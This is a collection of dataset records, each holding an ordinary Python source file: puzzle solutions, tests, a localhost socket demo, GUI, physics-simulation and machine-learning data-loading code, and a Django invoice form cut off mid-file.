+{"seq_id":"291245970","text":"import networkx as nx\n\ndef add_planet(graph, input):\n    inner = input[:input.find(')')]\n    outer = input[input.find(')') + 1:]\n    if (inner not in graph):\n        graph.add_node(inner)\n    if (outer not in graph):\n        graph.add_node(outer)\n    graph.add_edge(inner, outer)\n\ndef get_indirect_orbits(graph, node, ctr):\n    if (len(list(graph.successors(node))) == 0):\n        return (0)\n    else:\n        node_list = list(graph.successors(node))\n        ctr += len(node_list)\n        for elem in node_list:\n            ctr += get_indirect_orbits(graph, elem, 0)\n        return (ctr)\n\nif __name__ == \"__main__\":\n    G = nx.DiGraph()\n\n    for _ in range(2306):\n        input_line = input()\n        add_planet(G, input_line)\n    nodes = G.nodes()\n    edges = G.edges()\n    indirect_orbits = 0\n    for node in nodes:\n        indirect_orbits += get_indirect_orbits(G, node, 0)\n    planet_you = list(G.predecessors('YOU'))\n    planet_san = list(G.predecessors('SAN'))\n    print(indirect_orbits)\n    G = G.to_undirected()\n    print(len(nx.bidirectional_shortest_path(G, planet_you[0], planet_san[0])) - 1)\n","sub_path":"Day06/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"15494886","text":"import pytest\nfrom gamegym.strategy import UniformStrategy, FixedStrategy\nfrom gamegym.distribution import Explicit\nfrom gamegym.utils import get_rng\nfrom gamegym.games.matrix import *\n\n\ndef test_base():\n    gs = [\n        PrisonersDilemma(),\n        GameOfChicken(),\n        RockPaperScissors(),\n        MatchingPennies(),\n        MatrixZeroSumGame([[1, 3], [3, 2], [0, 0]], [\"A\", \"B\", \"C\"], [0, 1]),\n        MatrixGame([[1], [2], [3]], [[\"A1\", \"A2\", \"A3\"]]),\n        MatrixGame(np.zeros([2, 4, 5, 3], dtype=np.int32)),\n    ]\n    for g in gs:\n        s = g.initial_state()\n        assert not s.is_terminal()\n        assert s.player() == 0\n        assert len(s.actions()) == g.m.shape[0]\n        repr(s)\n        repr(g)\n    g = RockPaperScissors()\n    s = g.initial_state().play(\"R\").play(\"P\")\n    assert s.is_terminal()\n    print(s.history, s.values())\n    assert ((-1, 1) == s.values()).all()\n\n\ndef test_strategies():\n\n    g = RockPaperScissors()\n    rng = get_rng(seed=41)\n    s1 = [UniformStrategy(), UniformStrategy()]\n    v1 = np.mean(\n        [g.play_strategies(s1, rng=rng)[-1].values() for i in range(300)], 0)\n    assert sum(v1) == pytest.approx(0.0)\n    assert v1[0] == pytest.approx(0.0, abs=0.1)\n    s2 = [\n        FixedStrategy(Explicit({\"R\": 1.0, \"P\": 0.0, \"S\": 0.0})),\n        FixedStrategy(Explicit({\"R\": 0.5, \"P\": 0.5, \"S\": 0.0}))]\n    v2 = np.mean(\n        [g.play_strategies(s2, rng=rng)[-1].values() for i in range(300)], 0)\n    assert sum(v2) == pytest.approx(0.0)\n    assert v2[0] == pytest.approx(-0.5, abs=0.1)\n","sub_path":"tests/games/test_matrix.py","file_name":"test_matrix.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"625012718","text":"# imports\nfrom threading import Thread\nfrom random import randint\nimport socket\nimport time\n# from memory_profiler import profile\n\n# quantidade de threads cliente / servidor\nnum_threads = 5\n# tempos\n# servidor[i] = [cliente, tempo]\nservidor = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]\ntempos = [servidor, servidor, servidor, servidor, servidor]\n\n\n# linha de execução do servidor\n# @profile\ndef server(id):\n    global tempos\n    # criação da porta\n    port = 5000 + id\n    # contador de mensagens recebidas\n    mensagens_recebidas = 0\n    # criação do socket\n    try:\n        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        server.bind(('localhost', port))\n        server.listen(5)\n        print(\"Servidor {} iniciado - Porta: {}\".format(id, port))\n\n        # inicio da execução\n        try:\n            while(mensagens_recebidas < num_threads):\n                connect, client = server.accept()\n                print(\"Cliente conectado\")\n                msg = connect.recv(128)\n                msg = msg.decode()\n                if(not msg):\n                    continue\n\n                print(\"Servidor {} recebeu: {}\".format(id, msg))\n                mensagens_recebidas += 1\n                connect.close()\n        except Exception as e:\n            print(\"Falha de conexão na porta {}\".format(port))\n        finally:\n            connect.close()\n    except Exception as e:\n        print(\"Não foi possível inicializar o servidor {}\".format(port))\n    finally:\n        connect.close()\n        for i in range(len(tempos[id])):\n            tempos[id][i][1] = time.time() - tempos[id][i][1]\n        print(\"++++ Servidor {} concluído ++++\".format(id))\n\n\n# linha de execução do cliente\n# @profile\ndef client(id):\n    global tempos\n    # mensagem que será enviada\n    msg = str(randint(0, 100))\n    # contador de mensagens enviadas\n    mensagens_enviadas = 0\n    # criação dos sockets\n    sockets = []\n    for i in range(num_threads):\n        tempos[i][id % 5][1] = time.time()\n        sockets.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))\n        tempos[i][id % 5][0] = sockets[-1].getsockname()[1]\n\n    # inicio da execução\n    print(\"Cliente {} iniciou\".format(id))\n    while(mensagens_enviadas < num_threads):\n        # configura a porta\n        port = 5000 + mensagens_enviadas\n        # tenta enviar a mensagem\n        try:\n            sockets[mensagens_enviadas].connect(('localhost', port))\n            sockets[mensagens_enviadas].send(msg.encode())\n            print(\"Cliente {} enviou {} na porta {}\".format(id, msg, port))\n            mensagens_enviadas += 1\n        except Exception:\n            pass\n\n    print(\"Cliente {} concluído\".format(id))\n\n\n# criação e inicialização da thread servidor\nfor i in range(num_threads):\n    tserver = Thread(target=server, args=(i, ))\n    tserver.start()\n\n\n# criação e inicialização das threads cliente\nfor i in range(num_threads, 10):\n    tclient = Thread(target=client, args=(i, ))\n    tclient.start()\n    tclient.join()\n\n# cálculo da média do tempo\nmedia = 0\nfor servidor in tempos:\n    for cliente in servidor:\n        media += cliente[1]\n\nmedia *= 1000\nmedia /= 25\nprint('Tempo médio de comunicação: 
{}ms'.format(media))\n","sub_path":"socket/5x5.py","file_name":"5x5.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"546781923","text":"from pdb import set_trace as db\n\nwith open(\"raw-input.txt\") as f:\n    input = [int(n) for n in f.read().split(\"\\n\")]\n\ntest_str = \"\"\"35\n20\n15\n25\n47\n40\n62\n55\n65\n95\n102\n117\n150\n182\n127\n219\n299\n277\n309\n576\"\"\"\ntest_input = [int(n) for n in test_str.split(\"\\n\")]\n\n\ndef check_is_valid(chunk, num):\n    for (i, a) in enumerate(chunk):\n        for b in chunk[i + 1 :]:\n            if num == a + b:\n                return True\n    return False\n\n\ndef find_first_invalid(input, chunk_size):\n    chunk = input[:chunk_size]\n    i = chunk_size\n    while i < len(input):\n        curr = input[i]\n        if not check_is_valid(chunk, curr):\n            return curr\n        chunk.pop(0)\n        chunk.append(curr)\n        i += 1\n\n\nprint(find_first_invalid(test_input, 5))  # 127\nprint(find_first_invalid(input, 25))  # 167829540\n\n### BRUTE FORCE\n# def find_weakness(input, tgt_num):\n#     for (i, a) in enumerate(input):\n#         for (j, b) in enumerate(input[i + 1 :]):\n#             weak_arr = input[i : i + j + 1]\n#             arr_sum = sum(weak_arr)\n#             if arr_sum > tgt_num:\n#                 break\n#             elif arr_sum == tgt_num:\n#                 print(weak_arr)\n#                 return min(weak_arr) + max(weak_arr)\n\n### ROLLING SUM\ndef find_weakness(input, tgt_num):\n    start_i = 0\n    end_i = 1\n    arr_sum = sum(input[start_i : end_i])\n    while end_i < len(input):\n        if arr_sum == tgt_num:\n            break\n        elif arr_sum < tgt_num:\n            arr_sum += input[end_i]\n            end_i += 1\n        elif arr_sum > tgt_num:\n            arr_sum -= input[start_i]\n            start_i += 1\n\n    sub_arr = input[start_i : end_i]\n    return min(sub_arr) + max(sub_arr)\n\n\nprint(find_weakness(test_input, 127))  # 62\nprint(find_weakness(input, 167829540))  # 28045630\n","sub_path":"2020/day09/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"541324721","text":"from tkinter import Tk, Label, Button, Entry, Menu, font\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\nfrom protk import boolbox, button, colorcreator, colorscheme, combobox, compiler, entry, frame, framegrid, label, listbox, menu, treeview, window, expander\nimport time\nclass entry:\n\tdef __init__(self, widget_dict):\n\t\tself.__dict__.update(widget_dict)\t\t\n\t\twidget_dict[\"border\"]=\"0\"\n\t\tself.frame=frame.frame(widget_dict).frame\n\n\t\tif self.title != None:\n\t\t\twidget_dict[\"row\"]=1\n\t\t\twidget_dict[\"column\"]=1\n\t\t\twidget_dict[\"location\"]=self.frame\n\t\t\twidget_dict[\"expand_row\"]=\"0\"\n\t\t\twidget_dict[\"expand_column\"]=\"0\"\n\t\t\tself.row=1\n\t\t\tself.column=1\n\t\t\tself.expand_row=\"0\"\n\t\t\tself.expand_column=\"0\"\n\t\t\tself.title_label=label.label(widget_dict)\n\n\n\t\tself.entry=Entry(self.frame, bg=colorscheme.en_bg_color, fg=colorscheme.en_fg_color, disabledbackground=colorscheme.disabled_background, disabledforeground=colorscheme.disabled_foreground)\n\t\n\n\t\tif self.entry_position==\"n\":\n\t\t\tself.row=0\n\t\telif self.entry_position==\"s\":\n\t\t\tself.row=2\n\t\telif self.entry_position==\"e\":\n\t\t\tself.column=0\n\t\telif self.entry_position==\"w\":\n\t\t\tself.column=2\n\t\telif self.entry_position==None:\n\t\t\tself.column=0\n\t\n\t\tself.entry.grid(row=self.row, column=self.column, sticky=\"s\", pady=2, padx=2)\n\t\tif eval(self.read_only)==True:\n\t\t\tself.entry.config(state=\"disabled\")\n\t\texpander.check_expansion(self)\n\t\tself.typewrite_entry()\n\n\tdef typewrite_entry(self):\n\t\tif self.typewrite != True:\n\t\t\tself.entry.configure(width=self.width)\n\t\telse:\n\t\t\tfor a in range(0, self.width):\n\t\t\t\ttime.sleep(.01)\n\t\t\t\tself.entry.configure(width=a)\n\t\t\t\tself.root.update()\n\n\tdef insert_data(self, x):\n\t\tself.entry.delete(\"0\", END)\n\t\tself.entry.insert(\"0\", x)\n\t\tdef configure_entry_height(self, x):\n\t\t\tif len(x)<25:\n\t\t\t\tself.entry.configure(height=1)\n\t\t\telif len(x)>25 and len(x)<80:\n\t\t\t\tself.entry.configure(height=2)\n\t\t\telif len(x)>80 and len(x)<120:\n\t\t\t\tself.entry.configure(height=3)\n\t\t\telse:\n\t\t\t\tself.entry.configure(height=4)\n\t\tself.configure_entry_height(x)\n\n\tdef clear(self):\n\t\tself.entry.delete(\"0\", END)\n\tdef return_data(self):\n\t\treturn self.entry.get()\n\tdef get(self):\n\t\treturn self.entry.get()\n\n\n\nif __name__==\"__main__\":\n\tpass","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"430825889","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os.path\nimport argparse\nimport sys\nfrom scipy.spatial.transform import Rotation\n\nimport loopfield\n\n# two-coil setup\n#  width=2e-3\n\n\nfield = loopfield.Field()\n\n\ndef save_3d_file(output_file, data, header):\n    fh = open(output_file, 'w')\n    fh.write(header + \"\\n\")\n    shape = data.shape\n    for i in range(shape[0]):\n        block = data[i]\n        np.savetxt(fh, block, fmt=\"%.17g\", delimiter=\"\\t\")\n        fh.write(\"\\n\")\n    fh.close()\n\n    \ndef add_coil(pos, N, normal=[0,0,1], width=5.3e-3, r_o=30.25e-3 - 1e-3, r_i=5e-3, current=1):\n    # pos is coil midpoint\n    A = width * (r_o - r_i)\n    A_loop = A/N\n    d_loop = np.sqrt(A_loop)\n    N_d = int(round(width/d_loop))\n    N_r = int(round((r_o-r_i)/d_loop))\n    N_prod = N_d * N_r\n    print(\"building coil with %d x %d = %d loops, error = %d ( %.2g percent)\" % (N_d, N_r, N_prod, N_prod - N, 100 * np.abs((N_prod - N) / N)))\n    radiuses = np.linspace(r_i, r_o, N_r)\n    mid_points = pos + np.outer(np.linspace(-width/2, width/2, N_d), normal)\n    for radius in (radiuses):\n        for mid_point in (mid_points):\n            field.addLoop(loopfield.Loop(mid_point, normal, radius, current))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--force', action=\"store_true\", help=\"overwrite existing files\")\nparser.add_argument('-o', '--output', help=\"basename for output data files\")\nparser.add_argument('--tilt_x', help=\"tilt (in degrees) around x axis\", type=float, default=0)\nparser.add_argument('--shift_z', help=\"shift sample in z direction (m)\", type=float, default=0) \n\n\nargs = parser.parse_args()\n\nif args.output:\n    args.output += \"_tilt_x=%.2g\" % args.tilt_x\n    args.output += \"_shift_z=%.2g\" % args.shift_z\n    \nw = 25e-3 + 2e-3\ncoil_pos = np.array([0, 0, w])\nadd_coil(coil_pos, 9530)\nadd_coil(-coil_pos, 10623)\n\n# calculate field on axis\nN = 100\npos_vals = np.zeros((N,3))\nz_vals = np.linspace(-2e-3, 2e-3, N)\npos_vals[:,2] = z_vals\nfield_vals = field.evaluate(pos_vals)\ndata_axis = np.stack((z_vals, field_vals[:,2]), axis=1)\n\n\n\n# calculate field on sample plain\nN = 50\nd_sample = 6e-3\nsample_normal = np.array([0,0,1])\nx_vals = np.linspace(-d_sample/2, d_sample/2, N)\ny_vals = np.linspace(-d_sample/2, d_sample/2, N)\nx_mesh, y_mesh = np.meshgrid(x_vals, y_vals, indexing=\"ij\")\nsample_positions = np.zeros((N, N, 3))\nsample_positions[...,0] = x_mesh\nsample_positions[...,1] = y_mesh\n\n# tilt sample\n\nr = Rotation.from_euler('x', args.tilt_x, degrees=True)\nrotation_matrix = r.as_dcm()\n\ntilted_positions = np.dot(sample_positions, rotation_matrix.T)\n\n# shift sample\n\ntilted_positions = tilted_positions - np.array([0, 0, args.shift_z])\n\n# calculate field\n\nsample_fields = field.evaluate(np.reshape(tilted_positions, (N * N, 3)))\nsample_fields = np.reshape(sample_fields, (N, N, 3))\n\nsample_normal = np.dot(rotation_matrix, sample_normal)\nprint(\"tilted sample_normal = \", sample_normal)\n\nsample_normal_field = np.dot(sample_fields, sample_normal)\nsample_normal_field = np.reshape(sample_normal_field, (N, N, 1))\nprint(sample_normal_field.shape)\n\nsample_data = np.concatenate((sample_positions, tilted_positions, sample_fields, sample_normal_field), axis=2)\n\ndef ensure_unique(file):\n    if not args.force and os.path.isfile(file):\n        sys.exit(\"file %s already exists. 
Use -f option to overwrite\" % file)\n        \nif args.output:\n    axis_output_file = args.output + \"_axis.dat\"\n    ensure_unique(axis_output_file)\n    header = \"# z\\tB_z\"\n    np.savetxt(axis_output_file, data_axis, header=header, comments='', fmt=\"%.17g\")\n\n    sample_output_file = args.output + \"_sample_plain.dat\"\n    ensure_unique(sample_output_file)\n    \n    header = \"# x\\ty\\tz\\tx_t\\ty_t\\tz_t\\tB_x\\tB_y\\tB_z\\tB_normal\"\n    save_3d_file(sample_output_file, sample_data, header)\n\n\n\n\n","sub_path":"two-coil/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"183349010","text":"import time\nimport Cliente\n\n#Barranquilla, Cartagena, Bucaramanga, Cusco, San Andres Islas, Santa Marta, Valledup\n\nciudadesDestino = {\"Barranquilla\": [0,0], \"Cartagena\": [0,0], \"Bucaramanga\": [0,0], \"Cusco\": [0,0], \"San Andres Islas\": [0,0], \"Santa Marta\":[0,0], \"Valledupar\": [0,0]}\n\n\n#ciudadesDestino = {\"Barranquilla\": [0,0]}\n#las fechas que se quiere revisar\n\nlistaFechas = [10,11,12,13,14]\n\ndef repetirTresVeces(pFecha):\n\n    \n    for a in ciudadesDestino.keys():\n\n        fecha = 0\n        nombreCiudad = \"\"\n\n        nombreCiudad = a + \"Ciudad\"\n\n        while ciudadesDestino[a][0] < 3:\n            nombreCiudad = Cliente.Ciudad(a)\n            if nombreCiudad.solicitarVuelo(\"2019-11-\" + str(pFecha)):\n                print(\"Listo\", ciudadesDestino[a][0])\n\n            fecha += 1\n\n            ciudadesDestino[a][0] = fecha \n            time.sleep(60)\n     \n\n            #El primer elemento de la lista corresponde a los tres intentos con la misma fecha\n\ndef modificarFecha():\n\n    \n    for a in listaFechas:\n\n        repetirTresVeces(a)\n        for a in ciudadesDestino.keys():\n            ciudadesDestino[a][1] += 1\n            ciudadesDestino[a][0] = 0\n\n        time.sleep(180)\n        print(ciudadesDestino)\n\n\n\nmodificarFecha()\n","sub_path":"BuscadorIterativo.py","file_name":"BuscadorIterativo.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"328463836","text":"import numpy as np\nimport pandas as pd\n\n\ndef prepare_series(observations, transformations=None):\n    \"\"\"\n    Extracts the relevant parameters from a Series of observations to feed the\n    maxlike object.\n\n    Parameters\n    ----------\n    observations : pd.Series\n        sequence of observations, the index correspond to the features and the\n        values to the target values.\n    transformations : dict\n        (named) list of transformations to apply to observations labels,\n        grouped by index\n\n    Returns\n    -------\n    res : dict\n        resulting ndarrays after applying the transformations on the observations\n    axis : list[list]\n        feature index names\n    \"\"\"\n    if transformations is None:\n        transformations = {\"N\": np.size}\n\n    if isinstance(observations.index, pd.MultiIndex):\n        axis = tuple((level.sort_values()\n                      for level in observations.index.levels))\n        shape = tuple((len(a) for a in axis))\n        df = observations.groupby(observations.index).\\\n            agg(transformations.values()).\\\n            rename(columns={transf.__name__: name\n                            for name, transf in transformations.items()}).\\\n            reindex(pd.MultiIndex.from_product(axis)).fillna(0)\n    else:\n        axis = observations.index.sort_values()\n        shape = (axis.size)\n        df = observations.groupby(axis).agg(transformations.values()).\\\n            rename(columns={transf.__name__: name\n                            for name, transf in transformations.items()}).\\\n            reindex(axis).fillna(0)\n    res = {k: df[k].values.reshape(shape) for k in transformations.keys()}\n    return res, axis\n\n\ndef prepare_dataframe(df, weight_col, result_col, transformations):\n    axis = tuple((level.sort_values() for level in df.index.levels))\n    shape = tuple((len(a) for a in axis))\n    new_index = pd.MultiIndex.from_product(axis)\n    w = df[weight_col].to_frame('N').groupby(df.index).sum().\\\n        reindex(new_index).fillna(0)\n    df = (df[result_col] * df[weight_col]).groupby(df.index).\\\n        agg(transformations.values()).\\\n        rename(columns={transf.__name__: name\n                        for name, transf in transformations.items()}).\\\n        reindex(new_index).fillna(0)\n    res = {k: df[k].values.reshape(shape) for k in transformations.keys()}\n    res['N'] = w.values.reshape(shape)\n    return res, axis\n","sub_path":"maxlike/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"532916896","text":"# Для списка реализовать обмен значений соседних элементов,\n# т.е. Значениями обмениваются элементы с индексами 0 и 1, 2 и 3 и т.д.\n# При нечетном количестве элементов последний сохранить на своем месте.\n# Для заполнения списка элементов необходимо использовать функцию input().\n\n# Элементы\nelement1_int = input(\"Введите целое число: \")\nelement2_float = input(\"Введите вещественное число: \")\nelement3_int = input(\"Введите целое число: \")\nelement4_float = input(\"Введите вещественное число: \")\nelement5_str = input(\"Введите строку: \")\n# Список элементов\nelements_list = [element1_int, element2_float, element3_int, element4_float, element5_str]\nprint(elements_list)\n\nnum = 0\n# Обмен значений соседних элементов\nwhile num < len(elements_list):\n    if (num + 1) < len(elements_list):\n        temp = elements_list[num]\n        elements_list[num] = elements_list[num + 1]\n        elements_list[num + 1] = temp\n        num += 2\n    else:\n        num += 2\n\nprint(elements_list)\n","sub_path":"Lesson_2/L2_Task2.py","file_name":"L2_Task2.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"499430461","text":"# coding=utf-8\nimport sys\n\nsys.path.append(\"..\")\nimport nltk\nfrom gensim.models import KeyedVectors\nfrom utils.constants import *\nfrom torch.utils.data import Dataset\nimport random\nimport numpy as np\n\n\ndef tokenize(caption, word2vec):\n    punctuations = ['.', '?', ',', '', '(', ')']\n    raw_text = caption.lower()\n    words = nltk.word_tokenize(raw_text)\n    words = [word for word in words if word not in punctuations]\n    return [word for word in words if word in word2vec]\n\n\ndef rearrange(caption_output, box_output, label_output, threshold):\n    cosine_dist = calculate_dist(caption_output, label_output, dist='Cosine')\n    max_dist = torch.max(cosine_dist, dim=0)[0]\n    max_dist, sorted_indices = torch.sort(max_dist, descending=True)\n    key_indices = sorted_indices[max_dist > threshold]\n    other_indices = sorted_indices[max_dist <= threshold]\n    if key_indices.size(0) == 0:\n        key_indices = sorted_indices[0].unsqueeze(0)\n        other_indices = sorted_indices[1:]\n    key_boxes_criterion = torch.stack([box[0] + box[1] for box in box_output[key_indices]])\n    _, inner_index = torch.sort(key_boxes_criterion)\n    key_indices = key_indices[inner_index]\n    if other_indices.size(0) != 0:\n        other_boxes_criterion = torch.stack([box[0] + box[1] for box in box_output[other_indices]])\n        _, inner_index = torch.sort(other_boxes_criterion)\n        other_indices = other_indices[inner_index]\n    return key_indices, other_indices\n\n\ndef fetch_nouns(caption):\n    noun_list = []\n    for word_tuple in nltk.pos_tag(caption):\n        if word_tuple[1] == 'NN' or word_tuple[1] == 'NNS':\n            noun_list.append(word_tuple[0])\n    return noun_list\n\n\nclass DatasetCOCO(Dataset):\n    def __init__(self, params):\n        assert 'is_training' in params and type(params['is_training']) is bool, \\\n            'param \"is_training\" is required!'\n        assert 'glove_file' in params and type(params['glove_file']) is str, 'param \"glove_file\" is required!'\n        assert 'caption' in params and type(params['caption']) is str, 'param \"caption\" is required!'\n        assert 'bbox' in params and type(params['bbox']) is str, 'param \"bbox\" is required!'\n        assert 'key' in params and type(params['key']) is str, 'param \"key\" is required!'\n        assert 'label_table' in params and type(params['label_table']) is str, 'param \"label_table\" is required!'\n        assert 'max_word_num' in params and type(params['max_word_num']) is int, \\\n            'param \"max_word_num\" is required!'\n        assert 'max_bbox_num' in params and type(params['max_bbox_num']) is int, \\\n            'param \"max_bbox_num\" is required!'\n        assert 'max_label_num' in params and type(params['max_label_num']) is int, \\\n            'param \"max_label_num\" is required!'\n        assert 'word_embedding_dim' in params and type(params['word_embedding_dim']) is int, \\\n            'param \"word_embedding_dim\" is required!'\n        assert 'threshold' in params and type(params['threshold']) is float, 'param \"threshold\" is required!'\n\n        super(DatasetCOCO, self).__init__()\n        self.params = params\n        # dataset\n        self.glove_data = KeyedVectors.load_word2vec_format(params['glove_file'], binary=True)\n        self.caption_data = load_json(params['caption'])\n        self.bbox_data = load_json(params['bbox'])\n        self.key = load_json(params['key'])\n        self.label_table = 
load_json(params['label_table'])\n        self.embedding_table = self.label_embedding([i for i in range(0, 184)])\n        # print(self.embedding_table.size())\n\n    def __getitem__(self, index):\n        \"\"\"\n        :return:\n            caption_data : embedded caption vectors in shape (caption_len, embedding_dim)\n            box_data: left, top, width, height value of bounding boxes in shape (bbox_num, 4)\n            label_data: label information of bounding boxes in shape(bbox_num)\n            label_embedding_data: label information embedded in shape(bbox_num, label_embedding_dim)\n            caption_length: length of caption data\n            box_length: length of bbox data\n        \"\"\"\n        # Retrieve data from given files\n        item_key = self.key[index]\n        caption = self.caption_data[item_key]\n        annotation = self.bbox_data[item_key]\n\n        # handle caption\n        caption_tokenize = tokenize(random.choice(caption), self.glove_data)\n        noun_list = fetch_nouns(caption_tokenize)\n        noun_embedding = torch.tensor([self.glove_data[word] for word in noun_list])\n        noun_embedding = self.retrieve_label(noun_embedding, self.params['threshold'])\n        caption_embedding = torch.tensor([self.glove_data[word] for word in caption_tokenize])\n\n        # retrieve box information and label information\n        box_output = torch.tensor([box['bbox'] for box in annotation])\n        label_output = torch.tensor([box['category_id'] for box in annotation]).long()\n        label_embedding = self.label_embedding([box['category_id'] for box in annotation])\n        key_index, other_index = rearrange(caption_embedding, box_output, label_embedding, self.params['threshold'])\n        rearrange_index = torch.cat([key_index, other_index])\n\n        # do rearrange\n        box_output = box_output[rearrange_index]\n        label_output = label_output[rearrange_index]\n        label_embedding = label_embedding[rearrange_index]\n\n        # scale box coordination to 0-1\n        box_min_x = torch.min(box_output[:, 0])\n        box_max_x = torch.max(box_output[:, 0] + box_output[:, 2])\n        box_min_y = torch.min(box_output[:, 1])\n        box_max_y = torch.max(box_output[:, 1] + box_output[:, 3])\n        box_output[:, 0] = (box_output[:, 0] - box_min_x) / (box_max_x - box_min_x)\n        box_output[:, 1] = (box_output[:, 1] - box_min_y) / (box_max_y - box_min_y)\n        box_output[:, 2] = (box_output[:, 2]) / (box_max_x - box_min_x)\n        box_output[:, 3] = (box_output[:, 3]) / (box_max_y - box_min_y)\n\n        # calculate label_freq and label_prob\n        label_prob = torch.zeros(self.params['max_label_num'])\n        label_prob[np.unique(label_output)] = 1\n        label_freq = torch.tensor(np.bincount(label_output, minlength=self.params['max_label_num']))\n        # Eliminate the effect of unlabeled items\n        label_prob[-1] = 0\n        label_freq[-1] = 0\n\n        # Soft smoothing\n        idx_neg = label_prob < 0.5\n        idx_pos = label_prob > 0.5\n        rands_pos = torch.rand(label_prob.size(0)) * 0.1\n        rands_neg = torch.rand(label_prob.size(0)) * 0.1\n        label_prob = label_prob + idx_neg.float() * rands_neg - idx_pos.float() * rands_pos\n\n        # Pad outputs\n        caption_padded_embedding = torch.zeros((self.params['max_word_num'], self.params['word_embedding_dim']))\n        noun_padded_embedding = torch.zeros((self.params['max_word_num']))\n        box_padded_output = torch.zeros((self.params['max_bbox_num'], 
4))\n        label_padded_output = torch.zeros((self.params['max_bbox_num'])).long()\n        label_order_padded_output = torch.zeros((self.params['max_bbox_num']))\n        label_padded_embedding = torch.zeros((self.params['max_bbox_num'], self.params['word_embedding_dim']))\n        box_length = min(box_output.size(0), self.params['max_bbox_num'])\n        caption_length = min(len(caption_tokenize), self.params['max_word_num'])\n        noun_length = min(noun_embedding.size(0), self.params['max_word_num'])\n\n        # pad outputs\n        caption_padded_embedding[:caption_length, :] = caption_embedding[:caption_length, :]\n        if noun_length != 0:\n            noun_padded_embedding[:noun_length] = noun_embedding[:noun_length]\n        label_padded_embedding[:box_length, :] = label_embedding[:box_length, :]\n        box_padded_output[:box_length, :] = box_output[:box_length, :]\n        label_padded_output[:box_length] = label_output[:box_length]\n\n        # create masks\n        noun_mask = torch.zeros(self.params['max_word_num'])\n        noun_mask[:noun_length] = 1\n        other_mask = label_padded_output != 0\n        other_mask[:key_index.size(0)] = 0\n        key_mask = label_padded_output != 0\n        key_mask[key_index.size(0):] = 0\n\n        # create item order\n        order_list = torch.zeros(184)\n        for index, label in enumerate(label_output):\n            if index >= label_order_padded_output.size(0):\n                break\n            label_order_padded_output[index] = order_list[label]\n            order_list[label] += 1\n\n        return caption_padded_embedding, box_padded_output, label_padded_output, label_padded_embedding, \\\n               caption_length, box_length, key_index.size(0), label_freq, label_prob, noun_padded_embedding, \\\n               noun_length, noun_mask, key_mask, other_mask, label_order_padded_output\n\n    def __len__(self):\n        return len(self.key)\n\n    def label_embedding(self, label_list):\n        embedding_list = []\n        for label in label_list:\n            description = tokenize(self.label_table[str(label)], self.glove_data)\n            description_embedding = torch.mean(torch.tensor([self.glove_data[word] for word in description]), dim=0)\n            embedding_list.append(description_embedding)\n        return torch.stack(embedding_list)\n\n    def retrieve_label(self, noun_embedding, threshold):\n        if noun_embedding.size(0) == 0:\n            # print(self.key[index])\n            return torch.empty(0)\n        cosine_dist = calculate_dist(noun_embedding, self.embedding_table, dist='Cosine')\n        max_dist = torch.max(cosine_dist, dim=0)[0]\n        max_dist, sorted_indices = torch.sort(max_dist, descending=True)\n        key_labels = sorted_indices[max_dist > threshold]\n        # print(index, self.label_table[str(label.item())])\n        return key_labels[:6]\n\n\nif __name__ == '__main__':\n    param = {\n        'is_training': True,\n        'glove_file': \"../config/glove_model.bin\",\n        \"caption\": \"../config/COCO/annotation_train_caption.json\",\n        \"bbox\": \"../config/COCO/annotation_train_bbox.json\",\n        \"key\": \"../config/COCO/annotation_train.json\"\n    }\n    dataloader = DatasetCOCO(param)\n    print(dataloader[0][0].shape)\n","sub_path":"dataloaders/dataset_coco.py","file_name":"dataset_coco.py","file_ext":"py","file_size_in_byte":10100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"335718413","text":"from django.forms import FileField,EmailField,ValidationError,DateField,CharField,TimeField,Form,ModelForm, TextInput, ChoiceField, Select, ModelChoiceField, DateTimeInput\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom invoices.models import Invoice\nfrom clients.models import Client\nfrom datetime import datetime, date \nimport datetime \n\nfrom custom.choices import INVOICE_TYPE\nfrom dateutil.parser import *\n\nclass InvoiceForm(ModelForm):\n\t\n\tdue_date =  DateField(input_formats=settings.DATE_INPUT_FORMATS)\n\tinvoice_date = DateField(input_formats=settings.DATE_INPUT_FORMATS) \n\tstart_time = TimeField(input_formats=settings.TIME_INPUT_FORMATS, required=False)\n\tend_time = TimeField(input_formats=settings.TIME_INPUT_FORMATS, required=False)\n\t#invoice_type = ChoiceField(choices=INVOICE_TYPE, required=False)\n\n\n\tclass Meta:\n\t\tmodel = Invoice\n\t\tfields = ('invoice_number','hours','start_time','end_time','invoice_type','due_date','client','order_number','invoice_date','rate','amount','paid','remarks')\n\t\n\tdef __init__(self,*args, **kwargs):\n\t\t#import pdb; pdb.set_trace()\n\t\tself.user = kwargs.pop('user', 